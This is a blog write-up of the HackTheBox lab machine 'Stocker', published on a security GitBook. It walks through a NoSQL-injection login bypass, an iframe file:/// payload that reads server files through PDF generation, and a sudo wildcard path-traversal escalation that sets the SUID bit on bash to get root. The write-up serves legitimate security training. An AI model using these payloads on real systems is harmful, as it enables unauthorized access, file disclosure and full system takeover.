SecJournal
  • 👋Welcome
    • SecJournal
    • About Me
  • 👨‍💻Blogs
    • My Blogs
      • Malware
        • Fake WinRAR 0-Day
        • Github 0 Days
      • Scams
        • Social Engineering
        • May Chong
        • Liu Hongtian
        • Packing Green
        • Richard Spindler
        • Ukraine
        • Coalition Tech
        • Telegram Customer Service
      • Exploits
      • Random
        • Upgrade Shells
    • Course Reviews
      • OSCP / PEN-200 Review
      • Certified Red Team Operator (CRTO) Review
      • Certified Red Team Expert (CRTE) Review
      • OSWE / WEB-300 Review
      • OSED / EXP-301 Review
  • 🔐What is Security
    • Information Security
    • Getting Started
      • CTFs
      • Hacking
  • 🖱️Website Security
    • Disclosed Bugs
      • Dutch Government
      • Algolia API Misconfiguration
    • Web
      • MVC Framework
    • SQL Injection
      • Portswigger Labs
    • Access Control
      • Portswigger Labs
    • Authentication Bypass
      • Portswigger Labs
    • Business Logic
      • Portswigger Labs
    • Information Disclosure
      • Portswigger Labs
    • Directory Traversal
      • Portswigger Labs
    • Command Injection
      • Portswigger Labs
    • File Upload Vulnerabilities
      • Portswigger Labs
    • Server-Side Request Forgery
      • Portswigger Labs
    • Cross-Origin Resource Sharing
      • Portswigger Labs
    • Cross-Site Request Forgery
      • Portswigger Labs
    • Cross-Site Scripting
      • Portswigger XSS Labs
      • Portswigger DOM-XSS Labs
    • JSON Web Tokens
      • Portswigger Labs
    • API Testing
      • Portswigger Labs
    • WebSockets
      • Portswigger Labs
    • Deserialization
      • Portswigger Labs
    • Prototype Pollution
      • Portswigger Labs
    • Server-Side Template Injection
      • Portswigger Labs
    • XXE Injection
      • Portswigger Labs
    • Web Cache Poisoning
      • Portswigger Labs
    • HTTP Request Smuggling
      • Portswigger Labs
    • OAuth Authentication
      • Portswigger Labs
  • 👀Buffer Overflows
    • Buffer Overflows
      • System Architecture
      • Compilers, Assemblers, Debuggers and Decompilers
      • Binary Security
      • Address Manipulation
    • OSCP BOF (OUTDATED)
    • Ret2Libc
    • ROP Chaining
    • Canary Bypass
    • ASLR Bypass
  • 🖥️Active Directory
    • Active Directory
    • Tools
    • Windows Authentication
    • Kerberos
      • Delegation
      • Attacking Kerberos
    • ACLs and GPOs
      • Abusing ACLs and GPOs
    • LDAP
  • ✍️Writeups
    • HTB Season 3
      • Analytics
      • Appsanity
      • Codify
      • Devvortex
      • Drive
      • Hospital
      • Manager
      • Napper
      • Surveillance
      • Visual
    • HTB Season 2
      • Authority
      • Bookworm
      • Cozyhosting
      • Cybermonday
      • Download
      • Gofer
      • Intentions
      • Keeper
      • Pilgrimage
      • Rebound
      • RegistryTwo
      • Sandworm
      • Sau
      • Zipping
    • HTB Season 1
      • Agile
      • Busqueda
      • Cerberus
      • Coder
      • Format
      • Inject
      • Mailroom
      • MonitorsTwo
      • OnlyForYou
      • PC
      • Socket
      • Snoopy
    • HackTheBox
      • Easy
        • Academy
        • Access
        • Active
        • Admirer
        • Antique
        • Arctic
        • Armageddon
        • Backdoor
        • Bank
        • Bashed
        • Bastion
        • Blue
        • Blocky
        • Blunder
        • Bounty
        • Broker
        • Buff
        • Curling
        • Doctor
        • Driver
        • Explore
        • Forest
        • FriendZone
        • Frolic
        • GoodGames
        • Granny
        • Heist
        • Help
        • Horizontall
        • Irked
        • Jerry
        • Knife
        • Laboratory
        • Legacy
        • Luanne
        • Love
        • Mirai
        • MetaTwo
        • Nest
        • Netmon
        • Networked
        • Nibbles
        • NodeBlog
        • Omni
        • OpenAdmin
        • OpenSource
        • Optimum
        • Paper
        • Pandora
        • Photobomb
        • Postman
        • Precious
        • Previse
        • RedPanda
        • Remote
        • Return
        • RouterSpace
        • Sauna
        • ScriptKiddie
        • Secret
        • Sense
        • Servmon
        • Shoppy
        • Support
        • Soccer
        • Spectra
        • Squashed
        • SteamCloud
        • Stocker
        • SwagShop
        • Tabby
        • Timelapse
        • Toolbox
        • Topology
        • Traceback
        • Trick
        • TwoMillion
        • Valentine
        • Validation
        • Wifinetic
        • Writeup
      • Medium
        • Ambassador
        • Arkham
        • Atom
        • Backend
        • BackendTwo
        • Bagel
        • Bart
        • Bastard
        • Book
        • BroScience
        • Bucket
        • Cache
        • Canape
        • Cascade
        • Catch
        • Chaos
        • Chatterbox
        • Clicker
        • Cronos
        • Devoops
        • dynstr
        • Encoding
        • Epsilon
        • Escape
        • Faculty
        • Forge
        • Forgot
        • Fuse
        • Giddy
        • Haircut
        • Hawk
        • Intelligence
        • Interface
        • Investigation
        • Jeeves
        • Json
        • Jupiter
        • Lazy
        • Lightweight
        • Magic
        • Mentor
        • Meta
        • Monteverde
        • Nineveh
        • Noter
        • Obscurity
        • October
        • Ophiuchi
        • Outdated
        • Passage
        • Pit
        • Poison
        • Popcorn
        • Querier
        • Ransom
        • Resolute
        • Retired
        • Schooled
        • Scrambled
        • Shared
        • Shibboleth
        • Silo
        • SolidState
        • StreamIO
        • TartarSauce
        • Tenet
        • TheNotebook
        • Time
        • Unattended
        • Undetected
        • Unicode
        • Union
        • UpDown
        • Vault
      • Hard
        • Acute
        • Blackfield
        • BreadCrumbs
        • CarpeDiem
        • Extension
        • Falafel
        • Flight
        • Holiday
        • Kotarak
        • Mantis
        • Monitors
        • Object
        • Oouch
        • Pikaboo
        • Pollution
        • Quick
        • RainyDay
        • Reel
        • Registry
        • Search
        • Seventeen
        • Talkative
        • Unobtainium
        • Vessel
        • Zipper
      • Insane
        • Absolute
        • Anubis
        • APT
        • BrainFuck
        • CrossFit
        • Derailed
        • Fighter
        • Fulcrum
        • Hathor
        • Multimaster
        • pivotapi
        • Sekhmet
        • Sink
        • Sizzle
        • Stacked
    • Proving Grounds Practice
      • Windows
        • Access
        • Algernon
        • AuthBy
        • BillyBoss
        • Butch
        • Craft
        • Craft2
        • DVR4
        • Heist
        • Helpdesk
        • Hutch
        • Internal
        • Jacko
        • Kevin
        • Medjed
        • Nickel
        • Resourced
        • Shenzi
        • Slort
        • Squid
        • Symbolic
        • Vault
        • Vector
      • Linux
        • Apex
        • BadCorp
        • Banzai
        • Blackgate
        • Bratarina
        • Breakout
        • BunyIP
        • Cassios
        • Catto
        • Charlotte
        • Chatty
        • ClamAV
        • Cobweb
        • CookieCutter
        • Deployer
        • Depreciated
        • Develop
        • Dibble
        • Escape
        • Exfiltrated
        • Exghost
        • Fail
        • Fantastic
        • Flasky
        • Forward
        • Hawat
        • Hetemit
        • Hunit
        • Illusion
        • Injecto
        • KeyVault
        • G00g
        • Malbec
        • Mantis
        • Maria
        • Matrimony
        • Megavolt
        • Muddy
        • Nappa
        • Nukem
        • Payday
        • Pebbles
        • Pelican
        • Peppo
        • Phobos
        • Postfish
        • PlanetExpress
        • QuackerJack
        • Readys
        • Reconstruction
        • Roquefort
        • Sirol
        • Shiftdel
        • Shifty
        • Snookums
        • Sona
        • Sorcerer
        • Spaghetti
        • Splodge
        • Surf
        • Sybaris
        • Synapse
        • Tico
        • Thor
        • Twiggy
        • UC404
        • VoIP
        • Walla
        • Wheels
        • XposedAPI
        • ZenPhoto
        • Zino
  • 🐍Evasion
    • Evasion
      • Windows Fundamentals
      • Detection
      • Malware Techniques
  • 🔺Adversary Emulation
    • Red Teaming
      • Adversary Emulation
Powered by GitBook
On this page
  • Gaining Access
  • Subdomain Fuzzing
  • Login Bypass
  • Stock LFI
  • Privilege Escalation
  • Sudo
  1. Writeups
  2. HackTheBox
  3. Easy

Stocker

PreviousSteamCloudNextSwagShop

Gaining Access

Nmap scan:

$ nmap -p- --min-rate 3000 10.129.98.240 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-19 00:30 EST
Nmap scan report for stocker.htb (10.129.98.240)
Host is up (0.015s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

The domain was stocker.htb, and we can add that to the /etc/hosts file.

Subdomain Fuzzing

There was nothing of interest on the website. gobuster scans and default enumeration did not really help out a lot.

I decided to use wfuzz to fuzz the possible subdomains present on the website, and actually found one at dev.stocker.htb.

Interesting.

Login Bypass

At the dev site, all we see is one login page:

I tested out sqlmap or other SQL injections but it didn't work. It seems that we have to bypass this login to carry on with the machine. Proxying the traffic via Burp gave me a clearer picture on the error received when I entered wrong credentials:

POST /login HTTP/1.1

Host: dev.stocker.htb

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded

Content-Length: 27

Origin: http://dev.stocker.htb

Connection: close

Referer: http://dev.stocker.htb/login

Cookie: connect.sid=s%3Akg1SjHeFtX5eT0qfyd1SYLx_R3NRwNQ4.1K3jgUazClJr3WYMiGo9H9WoN6Di9M3ZGN4z9qgzMXU

Upgrade-Insecure-Requests: 1



username=test&password=test

There was a connect.sid endpoint, indicating that this was some type of Express website. Perhaps this was using MongoDB instead of regular SQL. I tested this JSON payload to bypass the login and it worked.

{"username": {"$ne": "foo"}, "password": {"$ne": "bar"} }

The website was some ordering website where we could place orders for items.

Stock LFI

I added some items and attemted to checkout from the website.

Viewing the purchase order brought us to a PDF page.

I downloaded the PDF and used exiftool on it to find that Skia is used to generate this PDF from Chromium.

$ exiftool document.pdf
ExifTool Version Number         : 12.49
File Name                       : document.pdf
Directory                       : .
File Size                       : 38 kB
File Modification Date/Time     : 2023:01:17 04:05:40-05:00
File Access Date/Time           : 2023:01:17 04:05:50-05:00
File Inode Change Date/Time     : 2023:01:17 04:05:40-05:00
File Permissions                : -rw-r--r--
File Type                       : PDF
File Type Extension             : pdf
MIME Type                       : application/pdf
PDF Version                     : 1.4
Linearized                      : No
Page Count                      : 1
Tagged PDF                      : Yes
Creator                         : Chromium
Producer                        : Skia/PDF m108
Create Date                     : 2023:01:17 09:05:09+00:00
Modify Date                     : 2023:01:17 09:05:09+00:00

Additionally, this was the request sent when we clicked checkout.

POST /api/order HTTP/1.1

Host: dev.stocker.htb

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0

Accept: */*

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: http://dev.stocker.htb/stock

Content-Type: application/json

Origin: http://dev.stocker.htb

Content-Length: 162

Connection: close

Cookie: connect.sid=s%3Akg1SjHeFtX5eT0qfyd1SYLx_R3NRwNQ4.1K3jgUazClJr3WYMiGo9H9WoN6Di9M3ZGN4z9qgzMXU



{"basket":[{"_id":"638f116eeb060210cbd83a8d","title":"Cup","description":"It's a red cup.","image":"red-cup.jpg","price":32,"currentStock":4,"__v":0,"amount":1}]}

The exploit is obviously to do with some parameter within the request being vulnerable when generating the RCE. I did some research on PDF related exploits, and found that it was possible to inject some HTML frames to cause an LFI.

I attempted this exploit using the file:/// wrapper to read the /etc/passwd file and it worked within the title header in the JSON data.

<iframe src='file:///etc/passwd' width=500px height=1000px ></iframe>

We find that the user is called angoose. I attempted to read more files such as the private SSH key of the user, but it seems that I either could not read it or it did not exist.

Remembering that this was an Express website, perhaps there was a Javascript file that I could read to find some credentials, particularly those used to access this server in the first place. WIthin the /var/www/dev/index.js file, I managed to find some credentials.

With this password, we can ssh in as angoose.

Privilege Escalation

Sudo

Checking sudo permissions, we find that angoose can use node as an administrator. There's also a wildcard in the scripts we can execute, which is never a good thing.

angoose@stocker:~$ sudo -l
[sudo] password for angoose: 
Sorry, try again.
[sudo] password for angoose: 
Matching Defaults entries for angoose on stocker:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User angoose may run the following commands on stocker:
    (ALL) /usr/bin/node /usr/local/scripts/*.js

Within that folder, there are some scripts already present.

angoose@stocker:/usr/local/scripts$ ls -la
total 32
drwxr-xr-x  3 root root 4096 Dec  6 10:33 .
drwxr-xr-x 11 root root 4096 Dec  6 10:33 ..
-rwxr-x--x  1 root root  245 Dec  6 09:53 creds.js
-rwxr-x--x  1 root root 1625 Dec  6 09:53 findAllOrders.js
-rwxr-x--x  1 root root  793 Dec  6 09:53 findUnshippedOrders.js
drwxr-xr-x  2 root root 4096 Dec  6 10:33 node_modules
-rwxr-x--x  1 root root 1337 Dec  6 09:53 profitThisMonth.js
-rwxr-x--x  1 root root  623 Dec  6 09:53 schema.js

I don't have write permissions in this folder. Neither can I read the scripts to find out what they do. However, because there's a wildcard, we can just enter ../../ to execute any script we want.

Here's a basic JS script for RCE using child_process.

#!/usr/bin/node
require('child_process').exec('chmod u+s /bin/bash')

Then, we can simply do this:

angoose@stocker:~$ sudo /usr/bin/node /usr/local/scripts/../../../../../home/angoose/evil.js 
angoose@stocker:~$ ls -la /bin/bash
-rwsr-xr-x 1 root root 1183448 Apr 18  2022 /bin/bash
angoose@stocker:~$ /bin/bash -p
bash-5.0# id
uid=1001(angoose) gid=1001(angoose) euid=0(root) groups=1001(angoose)

Pwned.

✍️
How I discovered an SSRF leading to AWS Metadata LeakageTechKranti
Logo